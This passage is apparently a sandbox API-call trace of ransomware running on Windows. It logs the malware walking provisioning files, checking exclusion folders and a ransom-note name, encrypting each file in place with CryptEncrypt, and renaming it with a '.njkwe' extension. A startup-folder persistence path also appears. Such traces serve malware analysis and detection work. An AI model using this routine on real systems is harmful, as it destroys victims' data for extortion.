lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.792] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.792] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.792] CloseHandle (hObject=0x43c) returned 1 [0076.793] GetProcessHeap () returned 0xbe0000 [0076.793] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.793] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\141__Connections_Cellular_Orange (France)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0076.793] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\141__Connections_Cellular_Orange (France)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\141__connections_cellular_orange (france)_i2$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\141__Connections_Cellular_Orange (France)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\141__connections_cellular_orange (france)_i2$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.793] GetProcessHeap () returned 0xbe0000 [0076.793] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.793] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9058f44f, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9058f44f, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9058f44f, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x34a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="142__Connections_Cellular_Orange (France)_i3$(__MVID)@WAP.provxml", cAlternateFileName="142__C~1.PRO")) returned 1 [0076.793] lstrcmpiW (lpString1="142__Connections_Cellular_Orange (France)_i3$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.793] lstrcmpiW (lpString1="142__Connections_Cellular_Orange (France)_i3$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.793] lstrcmpiW (lpString1="142__Connections_Cellular_Orange (France)_i3$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.793] lstrcmpiW (lpString1="142__Connections_Cellular_Orange (France)_i3$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.793] lstrcmpiW (lpString1="142__Connections_Cellular_Orange (France)_i3$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.793] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\142__Connections_Cellular_Orange (France)_i3$(__MVID)@WAP.provxml") returned 159 [0076.793] StrStrIW (lpFirst="142__Connections_Cellular_Orange (France)_i3$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.793] lstrcmpW (lpString1="142__Connections_Cellular_Orange (France)_i3$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.794] lstrcmpW (lpString1="142__Connections_Cellular_Orange (France)_i3$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.794] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\142__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.794] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\142__Connections_Cellular_Orange (France)_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\142__connections_cellular_orange (france)_i3$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.794] GetTickCount () returned 0x1153891 [0076.794] GetTickCount () returned 0x1153891 [0076.794] GetTickCount () returned 0x1153891 [0076.794] GetTickCount () returned 0x1153891 [0076.794] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.794] GetProcessHeap () returned 0xbe0000 [0076.794] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.794] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x34a, lpOverlapped=0x0) returned 1 [0076.796] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcb6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.796] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x34a, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x34a, lpOverlapped=0x0) returned 1 [0076.796] GetProcessHeap () returned 0xbe0000 [0076.796] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.796] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.796] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.796] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.796] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.796] CloseHandle (hObject=0x43c) returned 1 [0076.796] GetProcessHeap () returned 0xbe0000 [0076.796] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.796] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\142__Connections_Cellular_Orange (France)_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0076.796] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\142__Connections_Cellular_Orange (France)_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\142__connections_cellular_orange (france)_i3$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\142__Connections_Cellular_Orange (France)_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\142__connections_cellular_orange (france)_i3$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.797] GetProcessHeap () returned 0xbe0000 [0076.797] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.797] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9058f44f, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9058f44f, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9058f44f, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x346, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="143__Connections_Cellular_Orange (France)_i4$(__MVID)@WAP.provxml", cAlternateFileName="143__C~1.PRO")) returned 1 [0076.797] lstrcmpiW (lpString1="143__Connections_Cellular_Orange (France)_i4$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.797] lstrcmpiW (lpString1="143__Connections_Cellular_Orange (France)_i4$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.797] lstrcmpiW (lpString1="143__Connections_Cellular_Orange (France)_i4$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.797] lstrcmpiW (lpString1="143__Connections_Cellular_Orange (France)_i4$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.797] lstrcmpiW (lpString1="143__Connections_Cellular_Orange (France)_i4$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.797] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\143__Connections_Cellular_Orange (France)_i4$(__MVID)@WAP.provxml") returned 159 [0076.797] StrStrIW (lpFirst="143__Connections_Cellular_Orange (France)_i4$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.798] lstrcmpW (lpString1="143__Connections_Cellular_Orange (France)_i4$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.798] lstrcmpW (lpString1="143__Connections_Cellular_Orange (France)_i4$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.798] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\143__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.798] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\143__Connections_Cellular_Orange (France)_i4$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\143__connections_cellular_orange (france)_i4$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.798] GetTickCount () returned 0x11538a0 [0076.798] GetTickCount () returned 0x11538a0 [0076.798] GetTickCount () returned 0x11538a0 [0076.798] GetTickCount () returned 0x11538a0 [0076.798] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.798] GetProcessHeap () returned 0xbe0000 [0076.798] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.798] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x346, lpOverlapped=0x0) returned 1 [0076.799] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.800] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x346, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x346, lpOverlapped=0x0) returned 1 [0076.800] GetProcessHeap () returned 0xbe0000 [0076.800] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.800] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.800] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.800] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.800] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.800] CloseHandle (hObject=0x43c) returned 1 [0076.800] GetProcessHeap () returned 0xbe0000 [0076.800] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.800] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\143__Connections_Cellular_Orange (France)_i4$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0076.800] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\143__Connections_Cellular_Orange (France)_i4$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\143__connections_cellular_orange (france)_i4$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\143__Connections_Cellular_Orange (France)_i4$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\143__connections_cellular_orange (france)_i4$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.801] GetProcessHeap () returned 0xbe0000 [0076.801] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.801] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x905b56bb, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x905b56bb, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x905b56bb, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x34f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="144__Connections_Cellular_Orange (France)_i5$(__MVID)@WAP.provxml", cAlternateFileName="144__C~1.PRO")) returned 1 [0076.801] lstrcmpiW (lpString1="144__Connections_Cellular_Orange (France)_i5$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.801] lstrcmpiW (lpString1="144__Connections_Cellular_Orange (France)_i5$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.801] lstrcmpiW (lpString1="144__Connections_Cellular_Orange (France)_i5$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.801] lstrcmpiW (lpString1="144__Connections_Cellular_Orange (France)_i5$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.801] lstrcmpiW (lpString1="144__Connections_Cellular_Orange (France)_i5$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.801] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\144__Connections_Cellular_Orange (France)_i5$(__MVID)@WAP.provxml") returned 159 [0076.801] StrStrIW (lpFirst="144__Connections_Cellular_Orange (France)_i5$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.801] lstrcmpW (lpString1="144__Connections_Cellular_Orange (France)_i5$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.801] lstrcmpW (lpString1="144__Connections_Cellular_Orange (France)_i5$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.801] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\144__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.801] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\144__Connections_Cellular_Orange (France)_i5$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\144__connections_cellular_orange (france)_i5$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.802] GetTickCount () returned 0x11538a0 [0076.802] GetTickCount () returned 0x11538a0 [0076.802] GetTickCount () returned 0x11538a0 [0076.802] GetTickCount () returned 0x11538a0 [0076.802] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.802] GetProcessHeap () returned 0xbe0000 [0076.802] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.802] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x34f, lpOverlapped=0x0) returned 1 [0076.803] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcb1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.803] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x34f, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x34f, lpOverlapped=0x0) returned 1 [0076.803] GetProcessHeap () returned 0xbe0000 [0076.803] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.803] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.803] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.804] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.804] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.804] CloseHandle (hObject=0x43c) returned 1 [0076.804] GetProcessHeap () returned 0xbe0000 [0076.804] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.804] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\144__Connections_Cellular_Orange (France)_i5$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0076.804] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\144__Connections_Cellular_Orange (France)_i5$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\144__connections_cellular_orange (france)_i5$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\144__Connections_Cellular_Orange (France)_i5$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\144__connections_cellular_orange (france)_i5$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.805] GetProcessHeap () returned 0xbe0000 [0076.805] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.805] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x905b56bb, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x905b56bb, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x905b56bb, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x34a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="145__Connections_Cellular_Orange (France)_i6$(__MVID)@WAP.provxml", cAlternateFileName="145__C~1.PRO")) returned 1 [0076.805] lstrcmpiW (lpString1="145__Connections_Cellular_Orange (France)_i6$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.805] lstrcmpiW (lpString1="145__Connections_Cellular_Orange (France)_i6$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.805] lstrcmpiW (lpString1="145__Connections_Cellular_Orange (France)_i6$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.805] lstrcmpiW (lpString1="145__Connections_Cellular_Orange (France)_i6$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.805] lstrcmpiW (lpString1="145__Connections_Cellular_Orange (France)_i6$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.805] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\145__Connections_Cellular_Orange (France)_i6$(__MVID)@WAP.provxml") returned 159 [0076.805] StrStrIW (lpFirst="145__Connections_Cellular_Orange (France)_i6$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.805] lstrcmpW (lpString1="145__Connections_Cellular_Orange (France)_i6$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.805] lstrcmpW (lpString1="145__Connections_Cellular_Orange (France)_i6$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.805] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\145__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.805] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\145__Connections_Cellular_Orange (France)_i6$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\145__connections_cellular_orange (france)_i6$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.805] GetTickCount () returned 0x11538a0 [0076.805] GetTickCount () returned 0x11538a0 [0076.805] GetTickCount () returned 0x11538a0 [0076.805] GetTickCount () returned 0x11538a0 [0076.805] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.805] GetProcessHeap () returned 0xbe0000 [0076.806] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.806] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x34a, lpOverlapped=0x0) returned 1 [0076.816] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcb6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.816] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, 